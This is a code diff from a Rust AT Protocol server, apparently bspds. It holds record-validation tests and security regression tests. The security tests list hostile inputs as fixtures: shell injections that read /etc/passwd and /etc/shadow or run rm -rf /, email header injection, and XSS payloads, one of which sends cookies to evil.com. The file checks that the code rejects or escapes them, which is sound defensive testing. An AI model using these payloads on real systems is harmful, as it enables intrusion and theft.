"tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"] 102 + }); 103 + let result = validator.validate(&post, "app.bsky.feed.post"); 104 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 105 + } 106 + 107 + #[test] 108 + fn test_validate_post_eight_tags_ok() { 109 + let validator = RecordValidator::new(); 110 + let post = json!({ 111 + "$type": "app.bsky.feed.post", 112 + "text": "Hello", 113 + "createdAt": now(), 114 + "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"] 115 + }); 116 + let result = validator.validate(&post, "app.bsky.feed.post"); 117 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 118 + } 119 + 120 + #[test] 121 + fn test_validate_post_tag_too_long() { 122 + let validator = RecordValidator::new(); 123 + let long_tag = "t".repeat(641); 124 + let post = json!({ 125 + "$type": "app.bsky.feed.post", 126 + "text": "Hello", 127 + "createdAt": now(), 128 + "tags": [long_tag] 129 + }); 130 + let result = validator.validate(&post, "app.bsky.feed.post"); 131 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 132 + } 133 + 134 + #[test] 135 + fn test_validate_profile_valid() { 136 + let validator = RecordValidator::new(); 137 + let profile = json!({ 138 + "$type": "app.bsky.actor.profile", 139 + "displayName": "Test User", 140 + "description": "A test user profile" 141 + }); 142 + let result = validator.validate(&profile, "app.bsky.actor.profile"); 143 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 144 + } 145 + 146 + #[test] 147 + fn test_validate_profile_empty_ok() { 148 + let validator = RecordValidator::new(); 149 + let profile = json!({ 150 + "$type": "app.bsky.actor.profile" 151 + }); 152 + let result = validator.validate(&profile, "app.bsky.actor.profile"); 153 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 154 + } 155 + 156 + #[test] 157 + fn test_validate_profile_displayname_too_long() { 158 + let validator = RecordValidator::new(); 159 + let long_name = "n".repeat(641); 160 + let profile = json!({ 161 + "$type": "app.bsky.actor.profile", 162 + "displayName": long_name 163 + }); 164 + let result = validator.validate(&profile, "app.bsky.actor.profile"); 165 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 166 + } 167 + 168 + #[test] 169 + fn test_validate_profile_description_too_long() { 170 + let validator = RecordValidator::new(); 171 + let long_desc = "d".repeat(2561); 172 + let profile = json!({ 173 + "$type": "app.bsky.actor.profile", 174 + "description": long_desc 175 + }); 176 + let result = validator.validate(&profile, "app.bsky.actor.profile"); 177 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")); 178 + } 179 + 180 + #[test] 181 + fn test_validate_like_valid() { 182 + let validator = RecordValidator::new(); 183 + let like = json!({ 184 + "$type": "app.bsky.feed.like", 185 + "subject": { 186 + "uri": "at://did:plc:test/app.bsky.feed.post/123", 187 + "cid": "bafyreig6xxxxxyyyyyzzzzzz" 188 + }, 189 + "createdAt": now() 190 + }); 191 + let result = validator.validate(&like, "app.bsky.feed.like"); 192 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 193 + } 194 + 195 + #[test] 196 + fn test_validate_like_missing_subject() { 197 + let validator = RecordValidator::new(); 198 + let like = json!({ 199 + "$type": "app.bsky.feed.like", 200 + "createdAt": now() 201 + }); 202 + let result = validator.validate(&like, "app.bsky.feed.like"); 203 + assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 204 + } 205 + 206 + #[test] 207 + fn test_validate_like_missing_subject_uri() { 208 + let validator = RecordValidator::new(); 209 + let like = json!({ 210 + "$type": "app.bsky.feed.like", 211 + "subject": { 212 + "cid": "bafyreig6xxxxxyyyyyzzzzzz" 213 + }, 214 + "createdAt": now() 215 + }); 216 + let result = validator.validate(&like, "app.bsky.feed.like"); 217 + assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri"))); 218 + } 219 + 220 + #[test] 221 + fn test_validate_like_invalid_subject_uri() { 222 + let validator = RecordValidator::new(); 223 + let like = json!({ 224 + "$type": "app.bsky.feed.like", 225 + "subject": { 226 + "uri": "https://example.com/not-at-uri", 227 + "cid": "bafyreig6xxxxxyyyyyzzzzzz" 228 + }, 229 + "createdAt": now() 230 + }); 231 + let result = validator.validate(&like, "app.bsky.feed.like"); 232 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 233 + } 234 + 235 + #[test] 236 + fn test_validate_repost_valid() { 237 + let validator = RecordValidator::new(); 238 + let repost = json!({ 239 + "$type": "app.bsky.feed.repost", 240 + "subject": { 241 + "uri": "at://did:plc:test/app.bsky.feed.post/123", 242 + "cid": "bafyreig6xxxxxyyyyyzzzzzz" 243 + }, 244 + "createdAt": now() 245 + }); 246 + let result = validator.validate(&repost, "app.bsky.feed.repost"); 247 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 248 + } 249 + 250 + #[test] 251 + fn test_validate_repost_missing_subject() { 252 + let validator = RecordValidator::new(); 253 + let repost = json!({ 254 + "$type": "app.bsky.feed.repost", 255 + "createdAt": now() 256 + }); 257 + let result = validator.validate(&repost, "app.bsky.feed.repost"); 258 + assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 259 + } 260 + 261 + #[test] 262 + fn test_validate_follow_valid() { 263 + let validator = RecordValidator::new(); 264 + let follow = json!({ 265 + "$type": "app.bsky.graph.follow", 266 + "subject": "did:plc:test12345", 267 + "createdAt": now() 268 + }); 269 + let result = validator.validate(&follow, "app.bsky.graph.follow"); 270 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 271 + } 272 + 273 + #[test] 274 + fn test_validate_follow_missing_subject() { 275 + let validator = RecordValidator::new(); 276 + let follow = json!({ 277 + "$type": "app.bsky.graph.follow", 278 + "createdAt": now() 279 + }); 280 + let result = validator.validate(&follow, "app.bsky.graph.follow"); 281 + assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 282 + } 283 + 284 + #[test] 285 + fn test_validate_follow_invalid_subject() { 286 + let validator = RecordValidator::new(); 287 + let follow = json!({ 288 + "$type": "app.bsky.graph.follow", 289 + "subject": "not-a-did", 290 + "createdAt": now() 291 + }); 292 + let result = validator.validate(&follow, "app.bsky.graph.follow"); 293 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 294 + } 295 + 296 + #[test] 297 + fn test_validate_block_valid() { 298 + let validator = RecordValidator::new(); 299 + let block = json!({ 300 + "$type": "app.bsky.graph.block", 301 + "subject": "did:plc:blocked123", 302 + "createdAt": now() 303 + }); 304 + let result = validator.validate(&block, "app.bsky.graph.block"); 305 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 306 + } 307 + 308 + #[test] 309 + fn test_validate_block_invalid_subject() { 310 + let validator = RecordValidator::new(); 311 + let block = json!({ 312 + "$type": "app.bsky.graph.block", 313 + "subject": "not-a-did", 314 + "createdAt": now() 315 + }); 316 + let result = validator.validate(&block, "app.bsky.graph.block"); 317 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 318 + } 319 + 320 + #[test] 321 + fn test_validate_list_valid() { 322 + let validator = RecordValidator::new(); 323 + let list = json!({ 324 + "$type": "app.bsky.graph.list", 325 + "name": "My List", 326 + "purpose": "app.bsky.graph.defs#modlist", 327 + "createdAt": now() 328 + }); 329 + let result = validator.validate(&list, "app.bsky.graph.list"); 330 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 331 + } 332 + 333 + #[test] 334 + fn test_validate_list_name_too_long() { 335 + let validator = RecordValidator::new(); 336 + let long_name = "n".repeat(65); 337 + let list = json!({ 338 + "$type": "app.bsky.graph.list", 339 + "name": long_name, 340 + "purpose": "app.bsky.graph.defs#modlist", 341 + "createdAt": now() 342 + }); 343 + let result = validator.validate(&list, "app.bsky.graph.list"); 344 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 345 + } 346 + 347 + #[test] 348 + fn test_validate_list_empty_name() { 349 + let validator = RecordValidator::new(); 350 + let list = json!({ 351 + "$type": "app.bsky.graph.list", 352 + "name": "", 353 + "purpose": "app.bsky.graph.defs#modlist", 354 + "createdAt": now() 355 + }); 356 + let result = validator.validate(&list, "app.bsky.graph.list"); 357 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 358 + } 359 + 360 + #[test] 361 + fn test_validate_feed_generator_valid() { 362 + let validator = RecordValidator::new(); 363 + let generator = json!({ 364 + "$type": "app.bsky.feed.generator", 365 + "did": "did:web:example.com", 366 + "displayName": "My Feed", 367 + "createdAt": now() 368 + }); 369 + let result = validator.validate(&generator, "app.bsky.feed.generator"); 370 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 371 + } 372 + 373 + #[test] 374 + fn test_validate_feed_generator_displayname_too_long() { 375 + let validator = RecordValidator::new(); 376 + let long_name = "f".repeat(241); 377 + let generator = json!({ 378 + "$type": "app.bsky.feed.generator", 379 + "did": "did:web:example.com", 380 + "displayName": long_name, 381 + "createdAt": now() 382 + }); 383 + let result = validator.validate(&generator, "app.bsky.feed.generator"); 384 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 385 + } 386 + 387 + #[test] 388 + fn test_validate_unknown_type_returns_unknown() { 389 + let validator = RecordValidator::new(); 390 + let custom = json!({ 391 + "$type": "com.custom.record", 392 + "data": "test" 393 + }); 394 + let result = validator.validate(&custom, "com.custom.record"); 395 + assert_eq!(result.unwrap(), ValidationStatus::Unknown); 396 + } 397 + 398 + #[test] 399 + fn test_validate_unknown_type_strict_rejects() { 400 + let validator = RecordValidator::new().require_lexicon(true); 401 + let custom = json!({ 402 + "$type": "com.custom.record", 403 + "data": "test" 404 + }); 405 + let result = validator.validate(&custom, "com.custom.record"); 406 + assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 407 + } 408 + 409 + #[test] 410 + fn test_validate_type_mismatch() { 411 + let validator = RecordValidator::new(); 412 + let record = json!({ 413 + "$type": "app.bsky.feed.like", 414 + "subject": {"uri": "at://test", "cid": "bafytest"}, 415 + "createdAt": now() 416 + }); 417 + let result = validator.validate(&record, "app.bsky.feed.post"); 418 + assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual }) 419 + if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")); 420 + } 421 + 422 + #[test] 423 + fn test_validate_missing_type() { 424 + let validator = RecordValidator::new(); 425 + let record = json!({ 426 + "text": "Hello" 427 + }); 428 + let result = validator.validate(&record, "app.bsky.feed.post"); 429 + assert!(matches!(result, Err(ValidationError::MissingType))); 430 + } 431 + 432 + #[test] 433 + fn test_validate_not_object() { 434 + let validator = RecordValidator::new(); 435 + let record = json!("just a string"); 436 + let result = validator.validate(&record, "app.bsky.feed.post"); 437 + assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 438 + } 439 + 440 + #[test] 441 + fn test_validate_datetime_format_valid() { 442 + let validator = RecordValidator::new(); 443 + let post = json!({ 444 + "$type": "app.bsky.feed.post", 445 + "text": "Test", 446 + "createdAt": "2024-01-15T10:30:00.000Z" 447 + }); 448 + let result = validator.validate(&post, "app.bsky.feed.post"); 449 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 450 + } 451 + 452 + #[test] 453 + fn test_validate_datetime_with_offset() { 454 + let validator = RecordValidator::new(); 455 + let post = json!({ 456 + "$type": "app.bsky.feed.post", 457 + "text": "Test", 458 + "createdAt": "2024-01-15T10:30:00+05:30" 459 + }); 460 + let result = validator.validate(&post, "app.bsky.feed.post"); 461 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 462 + } 463 + 464 + #[test] 465 + fn test_validate_datetime_invalid_format() { 466 + let validator = RecordValidator::new(); 467 + let post = json!({ 468 + "$type": "app.bsky.feed.post", 469 + "text": "Test", 470 + "createdAt": "2024/01/15" 471 + }); 472 + let result = validator.validate(&post, "app.bsky.feed.post"); 473 + assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. }))); 474 + } 475 + 476 + #[test] 477 + fn test_validate_record_key_valid() { 478 + assert!(validate_record_key("3k2n5j2").is_ok()); 479 + assert!(validate_record_key("valid-key").is_ok()); 480 + assert!(validate_record_key("valid_key").is_ok()); 481 + assert!(validate_record_key("valid.key").is_ok()); 482 + assert!(validate_record_key("valid~key").is_ok()); 483 + assert!(validate_record_key("self").is_ok()); 484 + } 485 + 486 + #[test] 487 + fn test_validate_record_key_empty() { 488 + let result = validate_record_key(""); 489 + assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 490 + } 491 + 492 + #[test] 493 + fn test_validate_record_key_dot() { 494 + assert!(validate_record_key(".").is_err()); 495 + assert!(validate_record_key("..").is_err()); 496 + } 497 + 498 + #[test] 499 + fn test_validate_record_key_invalid_chars() { 500 + assert!(validate_record_key("invalid/key").is_err()); 501 + assert!(validate_record_key("invalid key").is_err()); 502 + assert!(validate_record_key("invalid@key").is_err()); 503 + assert!(validate_record_key("invalid#key").is_err()); 504 + } 505 + 506 + #[test] 507 + fn test_validate_record_key_too_long() { 508 + let long_key = "k".repeat(513); 509 + let result = validate_record_key(&long_key); 510 + assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 511 + } 512 + 513 + #[test] 514 + fn test_validate_record_key_at_max_length() { 515 + let max_key = "k".repeat(512); 516 + assert!(validate_record_key(&max_key).is_ok()); 517 + } 518 + 519 + #[test] 520 + fn test_validate_collection_nsid_valid() { 521 + assert!(validate_collection_nsid("app.bsky.feed.post").is_ok()); 522 + assert!(validate_collection_nsid("com.atproto.repo.record").is_ok()); 523 + assert!(validate_collection_nsid("a.b.c").is_ok()); 524 + assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 525 + } 526 + 527 + #[test] 528 + fn test_validate_collection_nsid_empty() { 529 + let result = validate_collection_nsid(""); 530 + assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 531 + } 532 + 533 + #[test] 534 + fn test_validate_collection_nsid_too_few_segments() { 535 + assert!(validate_collection_nsid("a").is_err()); 536 + assert!(validate_collection_nsid("a.b").is_err()); 537 + } 538 + 539 + #[test] 540 + fn test_validate_collection_nsid_empty_segment() { 541 + assert!(validate_collection_nsid("a..b.c").is_err()); 542 + assert!(validate_collection_nsid(".a.b.c").is_err()); 543 + assert!(validate_collection_nsid("a.b.c.").is_err()); 544 + } 545 + 546 + #[test] 547 + fn test_validate_collection_nsid_invalid_chars() { 548 + assert!(validate_collection_nsid("a.b.c/d").is_err()); 549 + assert!(validate_collection_nsid("a.b.c_d").is_err()); 550 + assert!(validate_collection_nsid("a.b.c@d").is_err()); 551 + } 552 + 553 + #[test] 554 + fn test_validate_threadgate() { 555 + let validator = RecordValidator::new(); 556 + let gate = json!({ 557 + "$type": "app.bsky.feed.threadgate", 558 + "post": "at://did:plc:test/app.bsky.feed.post/123", 559 + "createdAt": now() 560 + }); 561 + let result = validator.validate(&gate, "app.bsky.feed.threadgate"); 562 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 563 + } 564 + 565 + #[test] 566 + fn test_validate_labeler_service() { 567 + let validator = RecordValidator::new(); 568 + let labeler = json!({ 569 + "$type": "app.bsky.labeler.service", 570 + "policies": { 571 + "labelValues": ["spam", "nsfw"] 572 + }, 573 + "createdAt": now() 574 + }); 575 + let result = validator.validate(&labeler, "app.bsky.labeler.service"); 576 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 577 + } 578 + 579 + #[test] 580 + fn test_validate_list_item() { 581 + let validator = RecordValidator::new(); 582 + let item = json!({ 583 + "$type": "app.bsky.graph.listitem", 584 + "subject": "did:plc:test123", 585 + "list": "at://did:plc:owner/app.bsky.graph.list/mylist", 586 + "createdAt": now() 587 + }); 588 + let result = validator.validate(&item, "app.bsky.graph.listitem"); 589 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 590 + }
-86
tests/relay_client.rs
··· 1 - mod common; 2 - use common::*; 3 - 4 - use axum::{extract::ws::Message, routing::get, Router}; 5 - use bspds::{ 6 - state::AppState, 7 - sync::{firehose::SequencedEvent, relay_client::start_relay_clients}, 8 - }; 9 - use chrono::Utc; 10 - use tokio::net::TcpListener; 11 - use tokio::sync::mpsc; 12 - 13 - async fn mock_relay_server( 14 - listener: TcpListener, 15 - event_tx: mpsc::Sender<Vec<u8>>, 16 - connected_tx: mpsc::Sender<()>, 17 - ) { 18 - let handler = |ws: axum::extract::ws::WebSocketUpgrade| async { 19 - ws.on_upgrade(move |mut socket| async move { 20 - let _ = connected_tx.send(()).await; 21 - while let Some(Ok(msg)) = socket.recv().await { 22 - if let Message::Binary(bytes) = msg { 23 - let _ = event_tx.send(bytes.to_vec()).await; 24 - break; 25 - } 26 - } 27 - }) 28 - }; 29 - let app = Router::new().route("/", get(handler)); 30 - 31 - axum::serve(listener, app.into_make_service()) 32 - .await 33 - .unwrap(); 34 - } 35 - 36 - #[tokio::test] 37 - async fn test_outbound_relay_client() { 38 - let listener = TcpListener::bind("127.0.0.1:0").await.unwrap(); 39 - let addr = listener.local_addr().unwrap(); 40 - let (event_tx, mut event_rx) = mpsc::channel(1); 41 - let (connected_tx, _connected_rx) = mpsc::channel::<()>(1); 42 - tokio::spawn(mock_relay_server(listener, event_tx, connected_tx)); 43 - let relay_url = format!("ws://{}", addr); 44 - 45 - let db_url = get_db_connection_string().await; 46 - let pool = sqlx::postgres::PgPoolOptions::new() 47 - .connect(&db_url) 48 - .await 49 - .unwrap(); 50 - let state = AppState::new(pool).await; 51 - 52 - let (ready_tx, ready_rx) = mpsc::channel(1); 53 - start_relay_clients(state.clone(), vec![relay_url], Some(ready_rx)).await; 54 - 55 - tokio::time::timeout( 56 - tokio::time::Duration::from_secs(5), 57 - async { 58 - ready_tx.closed().await; 59 - } 60 - ) 61 - .await 62 - .expect("Timeout waiting for relay client to be ready"); 63 - 64 - let dummy_event = SequencedEvent { 65 - seq: 1, 66 - did: "did:plc:test".to_string(), 67 - created_at: Utc::now(), 68 - event_type: "commit".to_string(), 69 - commit_cid: Some("bafyreihffx5a4o3qbv7vp6qmxpxok5mx5xvlsq6z4x3xv3zqv7vqvc7mzy".to_string()), 70 - prev_cid: None, 71 - ops: Some(serde_json::json!([])), 72 - blobs: Some(vec![]), 73 - blocks_cids: Some(vec![]), 74 - }; 75 - state.firehose_tx.send(dummy_event).unwrap(); 76 - 77 - let received_bytes = tokio::time::timeout( 78 - tokio::time::Duration::from_secs(5), 79 - event_rx.recv() 80 - ) 81 - .await 82 - .expect("Timeout waiting for event") 83 - .expect("Event channel closed"); 84 - 85 - assert!(!received_bytes.is_empty()); 86 - }
···
+377
tests/security_fixes.rs
···
··· 1 + mod common; 2 + 3 + use bspds::notifications::{ 4 + SendError, is_valid_phone_number, sanitize_header_value, 5 + }; 6 + use bspds::oauth::templates::{login_page, error_page, success_page}; 7 + use bspds::image::{ImageProcessor, ImageError}; 8 + 9 + #[test] 10 + fn test_sanitize_header_value_removes_crlf() { 11 + let malicious = "Injected\r\nBcc: attacker@evil.com"; 12 + let sanitized = sanitize_header_value(malicious); 13 + 14 + assert!(!sanitized.contains('\r'), "CR should be removed"); 15 + assert!(!sanitized.contains('\n'), "LF should be removed"); 16 + assert!(sanitized.contains("Injected"), "Original content should be preserved"); 17 + assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)"); 18 + } 19 + 20 + #[test] 21 + fn test_sanitize_header_value_preserves_content() { 22 + let normal = "Normal Subject Line"; 23 + let sanitized = sanitize_header_value(normal); 24 + 25 + assert_eq!(sanitized, "Normal Subject Line"); 26 + } 27 + 28 + #[test] 29 + fn test_sanitize_header_value_trims_whitespace() { 30 + let padded = " Subject "; 31 + let sanitized = sanitize_header_value(padded); 32 + 33 + assert_eq!(sanitized, "Subject"); 34 + } 35 + 36 + #[test] 37 + fn test_sanitize_header_value_handles_multiple_newlines() { 38 + let input = "Line1\r\nLine2\nLine3\rLine4"; 39 + let sanitized = sanitize_header_value(input); 40 + 41 + assert!(!sanitized.contains('\r'), "CR should be removed"); 42 + assert!(!sanitized.contains('\n'), "LF should be removed"); 43 + assert!(sanitized.contains("Line1"), "Content before newlines preserved"); 44 + assert!(sanitized.contains("Line4"), "Content after newlines preserved"); 45 + } 46 + 47 + #[test] 48 + fn test_email_header_injection_sanitization() { 49 + let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; 50 + let sanitized = sanitize_header_value(header_injection); 51 + 52 + let lines: Vec<&str> = sanitized.split("\r\n").collect(); 53 + assert_eq!(lines.len(), 1, "Should be a single line after sanitization"); 54 + assert!(sanitized.contains("Normal Subject"), "Original content preserved"); 55 + assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text"); 56 + assert!(sanitized.contains("X-Injected:"), "All content on same line"); 57 + } 58 + 59 + #[test] 60 + fn test_valid_phone_number_accepts_correct_format() { 61 + assert!(is_valid_phone_number("+1234567890")); 62 + assert!(is_valid_phone_number("+12025551234")); 63 + assert!(is_valid_phone_number("+442071234567")); 64 + assert!(is_valid_phone_number("+4915123456789")); 65 + assert!(is_valid_phone_number("+1")); 66 + } 67 + 68 + #[test] 69 + fn test_valid_phone_number_rejects_missing_plus() { 70 + assert!(!is_valid_phone_number("1234567890")); 71 + assert!(!is_valid_phone_number("12025551234")); 72 + } 73 + 74 + #[test] 75 + fn test_valid_phone_number_rejects_empty() { 76 + assert!(!is_valid_phone_number("")); 77 + } 78 + 79 + #[test] 80 + fn test_valid_phone_number_rejects_just_plus() { 81 + assert!(!is_valid_phone_number("+")); 82 + } 83 + 84 + #[test] 85 + fn test_valid_phone_number_rejects_too_long() { 86 + assert!(!is_valid_phone_number("+12345678901234567890123")); 87 + } 88 + 89 + #[test] 90 + fn test_valid_phone_number_rejects_letters() { 91 + assert!(!is_valid_phone_number("+abc123")); 92 + assert!(!is_valid_phone_number("+1234abc")); 93 + assert!(!is_valid_phone_number("+a")); 94 + } 95 + 96 + #[test] 97 + fn test_valid_phone_number_rejects_spaces() { 98 + assert!(!is_valid_phone_number("+1234 5678")); 99 + assert!(!is_valid_phone_number("+ 1234567890")); 100 + assert!(!is_valid_phone_number("+1 ")); 101 + } 102 + 103 + #[test] 104 + fn test_valid_phone_number_rejects_special_chars() { 105 + assert!(!is_valid_phone_number("+123-456-7890")); 106 + assert!(!is_valid_phone_number("+1(234)567890")); 107 + assert!(!is_valid_phone_number("+1.234.567.890")); 108 + } 109 + 110 + #[test] 111 + fn test_signal_recipient_command_injection_blocked() { 112 + let malicious_inputs = vec![ 113 + "+123; rm -rf /", 114 + "+123 && cat /etc/passwd", 115 + "+123`id`", 116 + "+123$(whoami)", 117 + "+123|cat /etc/shadow", 118 + "+123\n--help", 119 + "+123\r\n--version", 120 + "+123--help", 121 + ]; 122 + 123 + for input in malicious_inputs { 124 + assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input); 125 + } 126 + } 127 + 128 + #[test] 129 + fn test_image_file_size_limit_enforced() { 130 + let processor = ImageProcessor::new(); 131 + 132 + let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024]; 133 + 134 + let result = processor.process(&oversized_data, "image/jpeg"); 135 + 136 + match result { 137 + Err(ImageError::FileTooLarge { .. }) => {} 138 + Err(other) => { 139 + let msg = format!("{:?}", other); 140 + if !msg.to_lowercase().contains("size") && !msg.to_lowercase().contains("large") { 141 + panic!("Expected FileTooLarge error, got: {:?}", other); 142 + } 143 + } 144 + Ok(_) => panic!("Should reject files over size limit"), 145 + } 146 + } 147 + 148 + #[test] 149 + fn test_image_file_size_limit_configurable() { 150 + let processor = ImageProcessor::new().with_max_file_size(1024); 151 + 152 + let data: Vec<u8> = vec![0u8; 2048]; 153 + 154 + let result = processor.process(&data, "image/jpeg"); 155 + 156 + assert!(result.is_err(), "Should reject files over configured limit"); 157 + } 158 + 159 + #[test] 160 + fn test_oauth_template_xss_escaping_client_id() { 161 + let malicious_client_id = "<script>alert('xss')</script>"; 162 + let html = login_page(malicious_client_id, None, None, "test-uri", None, None); 163 + 164 + assert!(!html.contains("<script>"), "Script tags should be escaped"); 165 + assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping"); 166 + } 167 + 168 + #[test] 169 + fn test_oauth_template_xss_escaping_client_name() { 170 + let malicious_client_name = "<img src=x onerror=alert('xss')>"; 171 + let html = login_page("client123", Some(malicious_client_name), None, "test-uri", None, None); 172 + 173 + assert!(!html.contains("<img "), "IMG tags should be escaped"); 174 + assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity"); 175 + } 176 + 177 + #[test] 178 + fn test_oauth_template_xss_escaping_scope() { 179 + let malicious_scope = "\"><script>alert('xss')</script>"; 180 + let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None); 181 + 182 + assert!(!html.contains("<script>"), "Script tags in scope should be escaped"); 183 + } 184 + 185 + #[test] 186 + fn test_oauth_template_xss_escaping_error_message() { 187 + let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>"; 188 + let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None); 189 + 190 + assert!(!html.contains("<script>"), "Script tags in error should be escaped"); 191 + } 192 + 193 + #[test] 194 + fn test_oauth_template_xss_escaping_login_hint() { 195 + let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\""; 196 + let html = login_page("client123", None, None, "test-uri", None, Some(malicious_hint)); 197 + 198 + assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint"); 199 + assert!(html.contains("&quot;"), "Quotes should be escaped"); 200 + } 201 + 202 + #[test] 203 + fn test_oauth_template_xss_escaping_request_uri() { 204 + let malicious_uri = "\" onmouseover=\"alert('xss')\""; 205 + let html = login_page("client123", None, None, malicious_uri, None, None); 206 + 207 + assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri"); 208 + } 209 + 210 + #[test] 211 + fn test_oauth_error_page_xss_escaping() { 212 + let malicious_error = "<script>steal()</script>"; 213 + let malicious_desc = "<img src=x onerror=evil()>"; 214 + 215 + let html = error_page(malicious_error, Some(malicious_desc)); 216 + 217 + assert!(!html.contains("<script>"), "Script tags should be escaped in error page"); 218 + assert!(!html.contains("<img "), "IMG tags should be escaped in error page"); 219 + } 220 + 221 + #[test] 222 + fn test_oauth_success_page_xss_escaping() { 223 + let malicious_name = "<script>steal_session()</script>"; 224 + 225 + let html = success_page(Some(malicious_name)); 226 + 227 + assert!(!html.contains("<script>"), "Script tags should be escaped in success page"); 228 + } 229 + 230 + #[test] 231 + fn test_oauth_template_no_javascript_urls() { 232 + let html = login_page("client123", None, None, "test-uri", None, None); 233 + assert!(!html.contains("javascript:"), "Login page should not contain javascript: URLs"); 234 + 235 + let error_html = error_page("test_error", None); 236 + assert!(!error_html.contains("javascript:"), "Error page should not contain javascript: URLs"); 237 + 238 + let success_html = success_page(None); 239 + assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs"); 240 + } 241 + 242 + #[test] 243 + fn test_oauth_template_form_action_safe() { 244 + let malicious_uri = "javascript:alert('xss')//"; 245 + let html = login_page("client123", None, None, malicious_uri, None, None); 246 + 247 + assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL"); 248 + } 249 + 250 + #[test] 251 + fn test_send_error_types_have_display() { 252 + let timeout = SendError::Timeout; 253 + let max_retries = SendError::MaxRetriesExceeded("test".to_string()); 254 + let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string()); 255 + 256 + assert!(!format!("{}", timeout).is_empty()); 257 + assert!(!format!("{}", max_retries).is_empty()); 258 + assert!(!format!("{}", invalid_recipient).is_empty()); 259 + } 260 + 261 + #[test] 262 + fn test_send_error_timeout_message() { 263 + let error = SendError::Timeout; 264 + let msg = format!("{}", error); 265 + assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout"); 266 + } 267 + 268 + #[test] 269 + fn test_send_error_max_retries_includes_detail() { 270 + let error = SendError::MaxRetriesExceeded("Server returned 503".to_string()); 271 + let msg = format!("{}", error); 272 + assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context"); 273 + } 274 + 275 + #[tokio::test] 276 + async fn test_check_signup_queue_accepts_session_jwt() { 277 + use common::{base_url, client, create_account_and_login}; 278 + 279 + let base = base_url().await; 280 + let http_client = client(); 281 + 282 + let (token, _did) = create_account_and_login(&http_client).await; 283 + 284 + let res = http_client 285 + .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 286 + .header("Authorization", format!("Bearer {}", token)) 287 + .send() 288 + .await 289 + .unwrap(); 290 + 291 + assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted"); 292 + 293 + let body: serde_json::Value = res.json().await.unwrap(); 294 + assert_eq!(body["activated"], true); 295 + } 296 + 297 + #[tokio::test] 298 + async fn test_check_signup_queue_no_auth() { 299 + use common::{base_url, client}; 300 + 301 + let base = base_url().await; 302 + let http_client = client(); 303 + 304 + let res = http_client 305 + .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 306 + .send() 307 + .await 308 + .unwrap(); 309 + 310 + assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work"); 311 + 312 + let body: serde_json::Value = res.json().await.unwrap(); 313 + assert_eq!(body["activated"], true); 314 + } 315 + 316 + #[test] 317 + fn test_html_escape_ampersand() { 318 + let html = login_page("client&test", None, None, "test-uri", None, None); 319 + assert!(html.contains("&amp;"), "Ampersand should be escaped"); 320 + assert!(!html.contains("client&test"), "Raw ampersand should not appear in output"); 321 + } 322 + 323 + #[test] 324 + fn test_html_escape_quotes() { 325 + let html = login_page("client\"test'more", None, None, "test-uri", None, None); 326 + assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped"); 327 + 